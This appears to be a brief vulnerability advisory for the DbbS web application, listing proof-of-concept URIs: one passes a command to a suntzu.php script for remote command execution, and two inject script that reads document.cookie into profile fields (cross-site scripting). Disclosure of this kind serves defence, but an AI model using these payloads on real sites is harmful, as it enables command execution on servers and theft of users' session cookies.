DbbS Multiple Input Validation Vulnerabilities

DbbS Multiple Input Validation Vulnerabilities

These issues can be exploited through a web client.

The following proof-of-concept URIs are available:

http://www.site.com/DbbS/suntzu.php?cmd=dir

http://www.site.com/DbbS/profile.php?mode=edit&myid=1&ulocation="><script>alert(document.cookie)</script>

http://www.site.com/DbbS/profile.php?mode=edit&myid=1&uhobbies="><script>alert(document.cookie)</script>